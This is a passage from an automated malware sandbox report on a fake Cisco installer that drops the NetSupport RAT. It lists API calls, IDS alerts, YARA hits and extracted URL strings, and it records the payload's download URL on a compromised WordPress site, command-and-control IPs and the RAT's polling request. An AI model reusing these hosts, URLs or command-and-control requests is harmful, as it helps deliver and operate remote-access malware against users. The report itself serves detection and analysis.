                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,12_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,12_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,12_2_68C4CA9B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50B33
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4EFE1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50F84
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,12_2_68C4C775
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50702
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4F8B5
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,12_2_68C4DA38
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C17C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C17C6D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4FD86
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,12_2_68C4DF35
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 4x nop then add byte ptr [edi], dh12_2_68C08468

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.11.20:49756 -> 151.236.16.15:443
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.11.20:49758 -> 199.188.200.195:443
                                  Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.11.20:49755 -> 54.37.62.77:443
                                  Source: Yara matchFile source: amsi32_3588.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Cisco\unins000.dat, type: DROPPED
                                  Source: is-2UOIT.tmp.6.drStatic PE information: Found NDIS imports: FwpsCalloutRegister1, FwpsCalloutRegister0, FwpmFilterDeleteById0, FwpmBfeStateSubscribeChanges0, FwpsCalloutUnregisterById0, FwpmFilterAdd0, FwpsStreamInjectAsync0, FwpsQueryPacketInjectionState0, FwpsInjectTransportReceiveAsync0, FwpsInjectTransportSendAsync0, FwpsConstructIpHeaderForTransportPacket0, FwpsFreeCloneNetBufferList0, FwpsAllocateCloneNetBufferList0, FwpsFreeNetBufferList0, FwpsAllocateNetBufferAndNetBufferList0, FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpsApplyModifiedLayerData0, FwpsAcquireWritableLayerDataPointer0, FwpsReleaseClassifyHandle0, FwpsAcquireClassifyHandle0, FwpmBfeStateUnsubscribeChanges0, FwpmEngineOpen0, FwpmEngineClose0, FwpmTransactionBegin0, FwpmTransactionCommit0, FwpmTransactionAbort0, FwpmProviderAdd0, FwpmProviderDeleteByKey0, FwpmSubLayerAdd0, FwpmSubLayerDeleteByKey0, FwpmCalloutAdd0, FwpmCalloutDeleteById0
                                  Source: is-LQ9L3.tmp.6.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmFilterAdd0, FwpmTransactionAbort0, FwpmFilterDeleteById0, FwpmTransactionBegin0, FwpmGetAppIdFromFileName0, FwpmEngineOpen0, FwpmSubLayerDeleteByKey0, FwpmSubLayerAdd0, FwpmTransactionCommit0, FwpmProviderAdd0, FwpmProviderDeleteByKey0
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: asknetsupertech.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: asknetsupertech.com
                                  Source: global trafficDNS traffic detected: DNS query: payiki.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: global trafficDNS traffic detected: DNS query: anyhowdo.com
                                  Source: unknownHTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0(
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: wget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crlIb0F
                                  Source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                                  Source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 0000000B.00000003.69437076663.00000000056F6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70083577485.00000000056F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp5
                                  Source: client32.exe, 0000000B.00000002.70081065717.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspS
                                  Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspY
                                  Source: client32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asps
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                                  Source: is-HNAJ2.tmp.6.drString found in binary or memory: http://www.cisco.com/c/en/us/td/docs/security/vpn_client/anyconnect/anyconnect40/user/guide/b_Androi
